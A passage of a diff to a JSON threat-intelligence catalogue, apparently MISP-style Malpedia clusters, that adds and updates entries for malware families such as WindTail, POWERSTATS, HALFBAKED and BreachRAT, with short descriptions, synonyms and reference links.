-2616,6 +3203,22 @@ "uuid": "d674ffd2-1f27-403b-8fe9-b4af6e303e5c", "value": "Uroburos (OS X)" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/osx.windtail", + "https://objective-see.com/blog/blog_0x3D.html", + "https://objective-see.com/blog/blog_0x3B.html", + "https://www.forbes.com/sites/thomasbrewster/2018/08/30/apple-mac-loophole-breached-in-middle-east-hacks/", + "https://gsec.hitb.org/materials/sg2018/D1%20COMMSEC%20-%20In%20the%20Trails%20of%20WINDSHIFT%20APT%20-%20Taha%20Karim.pdf" + ], + "synonyms": [], + "type": [] + }, + "uuid": "48751182-0b17-4326-8a72-41e4c4be35e7", + "value": "WindTail" + }, { "description": "", "meta": { @@ -2687,6 +3290,33 @@ "uuid": "120a5890-dc3e-42e8-950e-b5ff9a849d2a", "value": "XSLCmd" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/osx.yort", + "https://securelist.com/cryptocurrency-businesses-still-being-targeted-by-lazarus/90019/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "725cd3eb-1025-4da3-bcb1-a7b6591c632b", + "value": "Yort" + }, + { + "description": "Antak is a webshell written in ASP.Net which utilizes PowerShell.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/php.antak", + "https://github.com/samratashok/nishang/blob/master/Antak-WebShell/antak.aspx", + "http://www.labofapenetrationtester.com/2014/06/introducing-antak.html" + ], + "synonyms": [], + "type": [] + }, + "uuid": "88a71ca8-d99f-416a-ad29-5af12212008c", + "value": "ANTAK" + }, { "description": "", "meta": { @@ -2736,9 +3366,13 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.bondupdater", "https://www.boozallen.com/s/insight/blog/dark-labs-discovers-apt34-malware-variants.html?cid=spo-csatb-2", - "https://researchcenter.paloaltonetworks.com/2018/09/unit42-oilrig-uses-updated-bondupdater-target-middle-eastern-government/" + "https://www.zdnet.com/article/source-code-of-iranian-cyber-espionage-tools-leaked-on-telegram/", + "https://researchcenter.paloaltonetworks.com/2018/09/unit42-oilrig-uses-updated-bondupdater-target-middle-eastern-government/", + "https://unit42.paloaltonetworks.com/dns-tunneling-in-the-wild-overview-of-oilrigs-dns-tunneling/" + ], + "synonyms": [ + "Glimpse" ], - "synonyms": [], "type": [] }, "uuid": "99600ba5-30a0-4ac8-8583-6288760b77c3", @@ -2757,6 +3391,20 @@ "uuid": "0db05333-2214-49c3-b469-927788932aaa", "value": "GhostMiner" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.oilrig", + "https://www.vkremez.com/2018/03/investigating-iranian-threat-group.html", + "https://twitter.com/MJDutch/status/1074820959784321026?s=19" + ], + "synonyms": [], + "type": [] + }, + "uuid": "4a3b9669-8f91-47df-a8bf-a9876ab8edf3", + "value": "OilRig" + }, { "description": "", "meta": { @@ -2771,6 +3419,66 @@ "uuid": "4df1b257-c242-46b0-b120-591430066b6f", "value": "POSHSPY" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.powerpipe", + "https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html" + ], + "synonyms": [], + "type": [] + }, + "uuid": "60d7f668-66b6-401b-976f-918470a23c3d", + "value": "POWERPIPE" + }, + { + "description": "POWERSOURCE is a heavily obfuscated and modified version of the publicly available tool DNS_TXT_Pwnage. The backdoor uses DNS TXT requests for command and control and is installed in the registry or Alternate Data Streams.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.powersource", + "https://www.fireeye.com/blog/threat-research/2017/03/fin7_spear_phishing.html" + ], + "synonyms": [], + "type": [] + }, + "uuid": "a4584181-f739-43d1-ade9-8a7aa21278a0", + "value": "POWERSOURCE" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.powerspritz", + "https://www.proofpoint.com/sites/default/files/pfpt-us-wp-north-korea-bitten-by-bitcoin-bug.pdf" + ], + "synonyms": [], + "type": [] + }, + "uuid": "c07f6484-0669-44b7-90e6-f642e316d277", + "value": "PowerSpritz" + }, + { + "description": "POWERSTATS is a backdoor written in powershell.\r\nIt has the ability to disable Microsoft Office Protected View, fingerprint the victim and receive commands.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.powerstats", + "https://www.clearskysec.com/muddywater-operations-in-lebanon-and-oman/", + "https://unit42.paloaltonetworks.com/unit42-muddying-the-water-targeted-attacks-in-the-middle-east/", + "https://www.fireeye.com/blog/threat-research/2018/03/iranian-threat-group-updates-ttps-in-spear-phishing-campaign.html", + "https://blog.malwarebytes.com/threat-analysis/2017/09/elaborate-scripting-fu-used-in-espionage-attack-against-saudi-arabia-government_entity/", + "https://reaqta.com/2017/11/muddywater-apt-targeting-middle-east/", + "https://blog.trendmicro.com/trendlabs-security-intelligence/campaign-possibly-connected-muddywater-surfaces-middle-east-central-asia/", + "https://www.clearskysec.com/muddywater-targets-kurdish-groups-turkish-orgs/" + ], + "synonyms": [ + "Valyria" + ], + "type": [] + }, + "uuid": "b81d91b5-23a4-4f86-aea9-3f212169fce9", + "value": "POWERSTATS" + }, { "description": "", "meta": { @@ -2797,12 +3505,26 @@ "uuid": "63f6df51-4de3-495a-864f-0a7e30c3b419", "value": "POWRUNER" }, + { + "description": "The family is adding a fake root certificate authority, sets a proxy.pac-url for local browsers and redirects infected users to fake banking applications (currently targeting Poland). Based on information shared, it seems the PowerShell script is dropped by an exploit kit.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.presfox", + "https://twitter.com/kafeine/status/1092000556598677504" + ], + "synonyms": [], + "type": [] + }, + "uuid": "c8c5ca3c-7cf0-453e-9fe9-d5637b1ab1f8", + "value": "PresFox" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.quadagent", - "https://docs.google.com/document/d/1oYX3uN6KxIX_StzTH0s0yFNNoHDnV8VgmVqU5WoeErc/edit#heading=h.ez428aw98bca" + "https://docs.google.com/document/d/1oYX3uN6KxIX_StzTH0s0yFNNoHDnV8VgmVqU5WoeErc/edit#heading=h.ez428aw98bca", + "https://unit42.paloaltonetworks.com/dns-tunneling-in-the-wild-overview-of-oilrigs-dns-tunneling/" ], "synonyms": [], "type": [] @@ -2830,8 +3552,10 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.sload", "https://cyware.com/news/new-sload-malware-downloader-being-leveraged-by-apt-group-ta554-to-spread-ramnit-7d03f2d9", - "https://www.proofpoint.com/us/threat-insight/post/sload-and-ramnit-pairing-sustained-campaigns-against-uk-and-italy", "https://isc.sans.edu/forums/diary/Malicious+Powershell+Targeting+UK+Bank+Customers/23675/", + "https://blog.yoroi.company/research/the-sload-powershell-threat-is-expanding-to-italy/", + "https://www.cybereason.com/blog/banking-trojan-delivered-by-lolbins-ramnit-trojan", + "https://www.proofpoint.com/us/threat-insight/post/sload-and-ramnit-pairing-sustained-campaigns-against-uk-and-italy", "https://www.vkremez.com/2018/08/lets-learn-in-depth-into-latest-ramnit.html" ], "synonyms": [], @@ -2899,6 +3623,19 @@ "uuid": "f0ff8751-c182-4e9c-a275-81bb03e0cdf5", "value": "BrickerBot" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/py.pupy", + "https://github.com/n1nj4sec/pupy" + ], + "synonyms": [], + "type": [] + }, + "uuid": "afcc9bfc-1227-4bb0-a88a-5accdbfd58fa", + "value": "pupy (Python)" + }, { "description": "", "meta": { @@ -2926,6 +3663,20 @@ "uuid": "4305d59a-0d07-4021-a902-e7996378898b", "value": "FlexiSpy (symbian)" }, + { + "description": "The HALFBAKED malware family consists of multiple components designed to establish and maintain a foothold in victim networks, with the ultimate goal of gaining access to sensitive financial information.\r\nHALFBAKED listens for the following commands from the C2 server:\r\n\r\n info: Sends victim machine information (OS, Processor, BIOS and running processes) using WMI \r\n queries\r\n processList: Send list of process running\r\n screenshot: Takes screen shot of victim machine (using 58d2a83f777688.78384945.ps1)\r\n runvbs: Executes a VB script\r\n runexe: Executes EXE file\r\n runps1: Executes PowerShell script\r\n delete: Delete the specified file\r\n update: Update the specified file", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/vbs.halfbaked", + "https://attack.mitre.org/software/S0151/", + "https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html" + ], + "synonyms": [], + "type": [] + }, + "uuid": "095c995c-c916-488e-944d-a3f4b9842926", + "value": "HALFBAKED" + }, { "description": "The NJCCIC describes 7ev3n as a ransomware \"that targets the Windows OS and spreads via spam emails containing malicious attachments, as well as file sharing networks. It installs multiple files in the LocalAppData folder, each of which controls different functions including disabling bootup recovery options, deleting the ransomware installation file, encrypting data, and gaining administrator privileges. This variant also adds registry keys that disables various Windows function keys such as F1, F3, F4, F10, Alt, Num Lock, Ctrl, Enter, Escape, Shift, and Tab. Files encrypted by 7ev3n are labeled with a .R5A extension. It also locks victims out of Windows recovery options making it challenging to repair the damage done by 7ev3n.\"", "meta": { @@ -3033,7 +3784,7 @@ "value": "Acronym" }, { - "description": "Adam Locker (detected as RANSOM_ADAMLOCK.A) is a ransomware that encrypts targeted files on a victim’s system but offers them a free decryption key which can be accessed through Adf.ly, a URL shortening and advertising service.", + "description": "Adam Locker (detected as RANSOM_ADAMLOCK.A) is a ransomware that encrypts targeted files on a victim\u2019s system but offers them a free decryption key which can be accessed through Adf.ly, a URL shortening and advertising service.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.adam_locker", @@ -3127,7 +3878,7 @@ "value": "Agent Tesla" }, { - "description": "According to Trend Micro Encyclopia:\r\nALDIBOT first appeared in late August 2012 in relevant forums. Variants can steal passwords from the browser Mozilla Firefox, instant messenger client Pidgin, and the download manager jDownloader. ALDIBOT variants send the gathered information to their command-and-control (C&C) servers.\r\n\r\nThis malware family can also launch Distributed Denial of Service (DDoS) attacks using different protocols such as HTTP, TCP, UDP, and SYN. It can also perform flood attacks via Slowloris and Layer 7.\r\n\r\nThis bot can also be set up as a SOCKS proxy to abuse the infected machine as a proxy for any protocols.\r\n\r\nThis malware family can download and execute arbitrary files, and update itself. Variants can steal information, gathering the infected machine’s hardware identification (HWID), host name, local IP address, and OS version.\r\n\r\nThis backdoor executes commands from a remote malicious user, effectively compromising the affected system.", + "description": "According to Trend Micro Encyclopia:\r\nALDIBOT first appeared in late August 2012 in relevant forums. Variants can steal passwords from the browser Mozilla Firefox, instant messenger client Pidgin, and the download manager jDownloader. ALDIBOT variants send the gathered information to their command-and-control (C&C) servers.\r\n\r\nThis malware family can also launch Distributed Denial of Service (DDoS) attacks using different protocols such as HTTP, TCP, UDP, and SYN. It can also perform flood attacks via Slowloris and Layer 7.\r\n\r\nThis bot can also be set up as a SOCKS proxy to abuse the infected machine as a proxy for any protocols.\r\n\r\nThis malware family can download and execute arbitrary files, and update itself. Variants can steal information, gathering the infected machine\u2019s hardware identification (HWID), host name, local IP address, and OS version.\r\n\r\nThis backdoor executes commands from a remote malicious user, effectively compromising the affected system.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.aldibot", @@ -3144,9 +3895,14 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.alice_atm", - "http://blog.trendmicro.com/trendlabs-security-intelligence/alice-lightweight-compact-no-nonsense-atm-malware/" + "http://blog.trendmicro.com/trendlabs-security-intelligence/alice-lightweight-compact-no-nonsense-atm-malware/", + "https://www.s21sec.com/en/blog/2017/01/alice-simplicity-for-atm-jackpotting/", + "https://www.symantec.com/security-center/writeup/2016-122104-0203-99" + ], + "synonyms": [ + "AliceATM", + "PrAlice" ], - "synonyms": [], "type": [] }, "uuid": "41bfc8ad-ce2c-4ede-aa54-b3240a5cc8ca", @@ -3196,7 +3952,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.alma_communicator", - "https://researchcenter.paloaltonetworks.com/2017/11/unit42-oilrig-deploys-alma-communicator-dns-tunneling-trojan/" + "https://researchcenter.paloaltonetworks.com/2017/11/unit42-oilrig-deploys-alma-communicator-dns-tunneling-trojan/", + "https://unit42.paloaltonetworks.com/dns-tunneling-in-the-wild-overview-of-oilrigs-dns-tunneling/" ], "synonyms": [], "type": [] @@ -3301,6 +4058,21 @@ "uuid": "ad4e6779-59a6-4ad6-98de-6bd871ddb271", "value": "Alureon" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey", + "https://twitter.com/0xffff0800/status/1062948406266642432", + "https://twitter.com/ViriBack/status/1062405363457118210", + "https://krabsonsecurity.com/2019/02/13/analyzing-amadey-a-simple-native-malware/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "77f2c81f-be07-475a-8d77-f59b4847f696", + "value": "Amadey" + }, { "description": "", "meta": { @@ -3317,6 +4089,20 @@ "uuid": "ce25929c-0358-477c-a85e-f0bdfcc99a54", "value": "AMTsol" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.anatova_ransom", + "https://www.bleepingcomputer.com/news/security/new-anatova-ransomware-supports-modules-for-extra-functionality/", + "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/happy-new-year-2019-anatova-is-here/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "2a28ad28-8ba5-4b8b-9652-bc0cdd37b2c4", + "value": "Anatova Ransomware" + }, { "description": "", "meta": { @@ -3325,17 +4111,18 @@ "https://blog.fortinet.com/2014/04/16/a-good-look-at-the-andromeda-botnet", "https://www.europol.europa.eu/newsroom/news/andromeda-botnet-dismantled-in-international-cyber-operation", "https://blog.avast.com/andromeda-under-the-microscope", - "https://www.virusbulletin.com/virusbulletin/2013/08/andromeda-2-7-features", - "http://resources.infosecinstitute.com/andromeda-bot-analysis-part-two/", + "https://blog.fortinet.com/2014/05/19/new-anti-analysis-tricks-in-andromeda-2-08", "http://blog.morphisec.com/andromeda-tactics-analyzed", "https://eternal-todo.com/blog/yet-another-andromeda-gamarue-analysis", "http://resources.infosecinstitute.com/andromeda-bot-analysis/", + "https://blog.fortinet.com/2014/04/23/andromeda-2-7-features", "http://www.0xebfe.net/blog/2013/03/30/fooled-by-andromeda/", - "https://blog.fortinet.com/2014/05/19/new-anti-analysis-tricks-in-andromeda-2-08", + "https://www.virusbulletin.com/virusbulletin/2013/08/andromeda-2-7-features", "https://blogs.technet.microsoft.com/mmpc/2017/12/04/microsoft-teams-up-with-law-enforcement-and-other-partners-to-disrupt-gamarue-andromeda/", "https://www.virusbulletin.com/virusbulletin/2018/02/review-evolution-andromeda-over-years-we-say-goodbye/", + "https://www.proofpoint.com/sites/default/files/proofpoint-operation-transparent-tribe-threat-insight-en.pdf", "https://eternal-todo.com/blog/andromeda-gamarue-loves-json", - "https://blog.fortinet.com/2014/04/23/andromeda-2-7-features", + "http://resources.infosecinstitute.com/andromeda-bot-analysis-part-two/", "https://byte-atlas.blogspot.ch/2015/04/kf-andromeda-bruteforcing.html" ], "synonyms": [ @@ -3471,6 +4258,19 @@ "uuid": "1a4f99cc-c078-41f8-9749-e1dc524fc795", "value": "ARS VBS Loader" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.artra", + "https://unit42.paloaltonetworks.com/multiple-artradownloader-variants-used-by-bitter-to-target-pakistan/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "05de9c50-5958-4d02-b1a0-c4a2367c2d22", + "value": "Artra Downloader" + }, { "description": "", "meta": { @@ -3626,7 +4426,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.aurora", - "https://www.bleepingcomputer.com/news/security/azorult-trojan-serving-aurora-ransomware-by-malactor-oktropys/" + "https://www.bleepingcomputer.com/news/security/azorult-trojan-serving-aurora-ransomware-by-malactor-oktropys/", + "https://www.bleepingcomputer.com/ransomware/decryptor/how-to-decrypt-the-aurora-ransomware-with-auroradecrypter/" ], "synonyms": [], "type": [] @@ -3673,6 +4474,21 @@ "uuid": "606b160a-5180-4255-a1db-b2b9e8a52e95", "value": "Aveo" }, + { + "description": "Information stealer which uses AutoIT for wrapping.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.ave_maria", + "https://blog.yoroi.company/research/the-ave_maria-malware/" + ], + "synonyms": [ + "AVE_MARIA" + ], + "type": [] + }, + "uuid": "6bae792a-c2d0-42eb-b9e0-6ef1d83f9b25", + "value": "Ave Maria" + }, { "description": "", "meta": { @@ -3708,8 +4524,10 @@ "https://malwarebreakdown.com/2017/07/24/the-seamless-campaign-drops-ramnit-follow-up-malware-azorult-stealer-smoke-loader-etc/", "https://www.proofpoint.com/us/threat-insight/post/threat-actors-using-legitimate-paypal-accounts-to-distribute-chthonic-banking-trojan", "http://www.vkremez.com/2017/07/lets-learn-reversing-credential-and.html", + "https://blog.minerva-labs.com/azorult-now-as-a-signed-google-update", "https://www.proofpoint.com/us/threat-insight/post/new-version-azorult-stealer-improves-loading-features-spreads-alongside", "https://malwarebreakdown.com/2017/11/12/seamless-campaign-delivers-ramnit-via-rig-ek-at-188-225-82-158-follow-up-malware-is-azorult-stealer/", + "https://www.blueliv.com/blog-news/research/azorult-crydbrox-stops-sells-malware-credential-stealer/", "https://research.checkpoint.com/the-emergence-of-the-new-azorult-3-3/" ], "synonyms": [ @@ -3740,6 +4558,19 @@ "uuid": "947dffa1-0184-48d4-998e-1899ad97e93e", "value": "Babar" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.babylon_rat", + "https://twitter.com/KorbenD_Intel/status/1110654679980085262" + ], + "synonyms": [], + "type": [] + }, + "uuid": "1a196c09-f7cd-4a6e-bc3c-2489121b5381", + "value": "BabyLon RAT" + }, { "description": "", "meta": { @@ -3753,6 +4584,19 @@ "uuid": "30c2e5c6-851d-4f3a-8b6e-2e7b69a26467", "value": "BABYMETAL" }, + { + "description": "FireEye describes BACKBEND as a secondary downloader used as a backup mechanism in the case the primary backdoor is removed. When executed, BACKBEND checks for the presence of the mutexes MicrosoftZj or MicrosoftZjBak (both associated with BACKSPACE variants). If either of the mutexes exist, the malware exits.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.backbend", + "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf" + ], + "synonyms": [], + "type": [] + }, + "uuid": "934da8b2-f66e-4056-911e-1da09216e8b8", + "value": "BACKBEND" + }, { "description": "", "meta": { @@ -3811,11 +4655,12 @@ "value": "BadEncript" }, { - "description": "", + "description": "BADFLICK, a backdoor that is capable of modifying the file system, generating a reverse shell, and modifying its command-and-control configuration.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.badflick", - "https://www.fireeye.com/blog/threat-research/2018/03/suspected-chinese-espionage-group-targeting-maritime-and-engineering-industries.html" + "https://www.fireeye.com/blog/threat-research/2018/03/suspected-chinese-espionage-group-targeting-maritime-and-engineering-industries.html", + "https://blog.amossys.fr/badflick-is-not-so-bad.html" ], "synonyms": [], "type": [] @@ -3866,6 +4711,22 @@ "uuid": "4038c3bc-b559-45bb-bac1-9665a54dedf9", "value": "Bahamut (Windows)" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.baldir", + "https://blog.malwarebytes.com/threat-analysis/2019/04/say-hello-baldr-new-stealer-market/", + "https://www.youtube.com/watch?v=E2V4kB_gtcQ" + ], + "synonyms": [ + "Baldr" + ], + "type": [] + }, + "uuid": "7024893a-96fe-4de4-bb04-c1d4794a4c95", + "value": "Baldir" + }, { "description": "", "meta": { @@ -3976,6 +4837,19 @@ "uuid": "cad1d6db-3a6c-4d67-8f6e-627d8a168d6a", "value": "BBSRAT" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.beapy", + "https://www.symantec.com/blogs/threat-intelligence/beapy-cryptojacking-worm-china" + ], + "synonyms": [], + "type": [] + }, + "uuid": "404e8121-bced-4320-a984-2b490fad90f8", + "value": "Beapy" + }, { "description": "", "meta": { @@ -3989,7 +4863,7 @@ "value": "Bedep" }, { - "description": "", + "description": "BEENDOOR is a XMPP based trojan. It is capable of taking screenshots of the victim's desktop.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.beendoor", @@ -4001,12 +4875,38 @@ "uuid": "e2dca2b5-7ca0-4654-ae3d-91dab60dfd90", "value": "beendoor" }, + { + "description": "Once set up in the system, Trojan.Belonard replaces the list of available game servers in the game client and creates proxies on the infected computer to spread the Trojan. As a rule, proxy servers show a lower ping, so other players will see them at the top of the list. By selecting one of them, a player gets redirected to a malicious server where their computer become infected with Trojan.Belonard.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.belonard", + "https://news.drweb.com/show/?i=13135&c=23&lng=en&p=0" + ], + "synonyms": [], + "type": [] + }, + "uuid": "40c48c99-7d33-4f35-92f1-937c3686afa7", + "value": "Belonard" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.berbomthum", + "https://blog.trendmicro.com/trendlabs-security-intelligence/cybercriminals-use-malicious-memes-that-communicate-with-malware/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "6944cbe7-db95-422d-8751-98c9fc4f0b12", + "value": "Berbomthum" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.bernhardpos", - "https://www.morphick.com/resources/news/bernhardpos-new-pos-malware-discovered-morphick" + "https://securitykitten.github.io/2015/07/14/bernhardpos.html" ], "synonyms": [], "type": [] @@ -4036,6 +4936,19 @@ "uuid": "837c5618-69dc-4817-8672-b3d7ae644f5c", "value": "BetaBot" }, + { + "description": "Bezigate is a Trojan horse that opens a back door on the compromised computer. It may also download potentially malicious files. \r\n\r\nThe Trojan may perform the following actions: \r\nList, move, and delete drives\r\nList, move, and delete files\r\nList processes and running Windows titles\r\nList services\r\nList registry values\r\nKill processes\r\nMaximize, minimize, and close windows\r\nUpload and download files\r\nExecute shell commands\r\nUninstall itself", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.bezigate", + "https://www.proofpoint.com/sites/default/files/proofpoint-operation-transparent-tribe-threat-insight-en.pdf" + ], + "synonyms": [], + "type": [] + }, + "uuid": "29f45180-cb57-4655-8812-eb814c2a0b0e", + "value": "Bezigate" + }, { "description": "", "meta": { @@ -4063,6 +4976,20 @@ "uuid": "42ed9fc4-08ba-4c1c-bf15-d789ee4e3ca6", "value": "BillGates" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.biodata", + "https://unit42.paloaltonetworks.com/unit42-recent-inpage-exploits-lead-multiple-malware-families/", + "https://ti.360.net/blog/articles/analysis-of-targeted-attack-against-pakistan-by-exploiting-inpage-vulnerability-and-related-apt-groups-english/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "96bcaa83-998b-4fb2-a4e7-a2d33c6427d7", + "value": "BioData" + }, { "description": "", "meta": { @@ -4091,6 +5018,20 @@ "uuid": "3e072464-6fa6-4977-9b64-08f86d1062fc", "value": "Bitsran" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.bitter_rat", + "https://ti.360.net/blog/articles/analysis-of-targeted-attack-against-pakistan-by-exploiting-inpage-vulnerability-and-related-apt-groups-english/", + "https://www.forcepoint.com/blog/security-labs/bitter-targeted-attack-against-pakistan" + ], + "synonyms": [], + "type": [] + }, + "uuid": "265f96d1-fdd4-4dec-b7ca-51ae6f726634", + "value": "Bitter RAT" + }, { "description": "BKA Trojaner is a screenlocker ransomware that was active in 2011, displaying a police-themed message in German language.", "meta": { @@ -4106,6 +5047,22 @@ "uuid": "ea06f87c-148c-49e5-afec-7012cb2b4f0a", "value": "BKA Trojaner" }, + { + "description": "a backdoor that obfuscates its communications as normal traffic to legitimate websites such as Github and Microsoft's Technet portal.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.blackcoffee", + "https://www.fireeye.com/blog/threat-research/2018/03/suspected-chinese-espionage-group-targeting-maritime-and-engineering-industries.html", + "https://attack.mitre.org/software/S0069/", + "https://www2.fireeye.com/rs/fireye/images/APT17_Report.pdf", + "http://malware-log.hatenablog.com/entry/2015/05/18/000000_1" + ], + "synonyms": [], + "type": [] + }, + "uuid": "ff660bf2-a9e4-4973-be0c-9f6618e40899", + "value": "BLACKCOFFEE" + }, { "description": "", "meta": { @@ -4113,6 +5070,7 @@ "https://malpedia.caad.fkie.fraunhofer.de/details/win.blackenergy", "https://securelist.com/blackenergy-apt-attacks-in-ukraine-employ-spearphishing-with-word-documents/73440/", "https://securelist.com/be2-extraordinary-plugins-siemens-targeting-dev-fails/68838/", + "https://marcusedmondson.com/2019/01/18/black-energy-analysis/", "https://securelist.com/be2-custom-plugins-router-abuse-and-target-profiles/67353/" ], "synonyms": [], @@ -4151,6 +5109,22 @@ "uuid": "6a5bd819-5fbc-437b-92c4-ce0dfb5c67f8", "value": "BlackRevolution" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.blackrouter", + "https://www.bleepingcomputer.com/news/security/blackrouter-ransomware-promoted-as-a-raas-by-iranian-developer/", + "https://blog.trendmicro.com/trendlabs-security-intelligence/legitimate-application-anydesk-bundled-with-new-ransomware-variant/" + ], + "synonyms": [ + "BLACKHEART" + ], + "type": [] + }, + "uuid": "0b235fbf-c191-47c0-ae83-9386a64b1c79", + "value": "BlackRouter" + }, { "description": "", "meta": { @@ -4226,7 +5200,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.bozok", - "https://www.fireeye.com/blog/threat-research/2013/10/know-your-enemy-tracking-a-rapidly-evolving-apt-actor.html" + "https://www.fireeye.com/blog/threat-research/2013/10/know-your-enemy-tracking-a-rapidly-evolving-apt-actor.html", + "https://unit42.paloaltonetworks.com/unit42-projectm-link-found-between-pakistani-actor-and-operation-transparent-tribe" ], "synonyms": [], "type": [] @@ -4234,6 +5209,19 @@ "uuid": "f9d0e934-879c-4668-b959-6bf7bdc96f5d", "value": "Bozok" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.brain", + "https://www.welivesecurity.com/2017/01/18/flashback-wednesday-pakistani-brain/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "1619ee64-fc54-47c0-8ee1-8b786fefc0fd", + "value": "BRAIN" + }, { "description": "", "meta": { @@ -4263,7 +5251,20 @@ "value": "BravoNC" }, { - "description": "There is no reference available for this family and all known samples have version 1.0.0.\r\n\r\nPdb-strings in the samples suggest that this is an \"exclusive\" loader, known as \"breakthrough\" (maybe), e.g. C:\\Users\\Exclusiv\\Desktop\\хп-пробив\\Release\\build.pdb\r\n\r\nThe communication url parameters are pretty unique in this combination:\r\ngate.php?hwid=&os=&build=1.0.0&cpu=8\r\n\r\n is one of:\r\nWindows95\r\nWindows98\r\nWindowsMe\r\nWindows95family\r\nWindowsNT3\r\nWindowsNT4\r\nWindows2000\r\nWindowsXP\r\nWindowsServer2003\r\nWindowsNTfamily\r\nWindowsVista\r\nWindows7\r\nWindows8\r\nWindows10\r\n", + "description": "This is a backdoor which FireEye call the Breach Remote Administration Tool (BreachRAT), written in C++. The malware name is derived from the hardcoded PDB path found in the RAT: C:\\Work\\Breach Remote Administration Tool\\Release\\Client.pdb", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.breach_rat", + "https://www.fireeye.com/blog/threat-research/2016/06/apt_group_sends_spea.html" + ], + "synonyms": [], + "type": [] + }, + "uuid": "52cf2986-89e8-463d-90b6-e4356c9777e7", + "value": "BreachRAT" + }, + { + "description": "There is no reference available for this family and all known samples have version 1.0.0.\r\n\r\nPdb-strings in the samples suggest that this is an \"exclusive\" loader, known as \"breakthrough\" (maybe), e.g. C:\\Users\\Exclusiv\\Desktop\\\u0445\u043f-\u043f\u0440\u043e\u0431\u0438\u0432\\Release\\build.pdb\r\n\r\nThe communication url parameters are pretty unique in this combination:\r\ngate.php?hwid=&os=&build=1.0.0&cpu=8\r\n\r\n is one of:\r\nWindows95\r\nWindows98\r\nWindowsMe\r\nWindows95family\r\nWindowsNT3\r\nWindowsNT4\r\nWindows2000\r\nWindowsXP\r\nWindowsServer2003\r\nWindowsNTfamily\r\nWindowsVista\r\nWindows7\r\nWindows8\r\nWindows10\r\n", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.breakthrough_loader" @@ -4288,6 +5289,19 @@ "uuid": "55d343a1-7e80-4254-92eb-dfb433b91a90", "value": "Bredolab" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.brushaloader", + "https://blog.talosintelligence.com/2019/02/combing-through-brushaloader.html" + ], + "synonyms": [], + "type": [] + }, + "uuid": "75a03c4f-8a97-4fc0-a69e-b2e73e4564fc", + "value": "BrushaLoader" + }, { "description": "", "meta": { @@ -4328,6 +5342,20 @@ "uuid": "d29786c6-2cc0-4e2f-97b0-242a1d9e9bf8", "value": "BTCWare" }, + { + "description": "BUBBLEWRAP is a full-featured 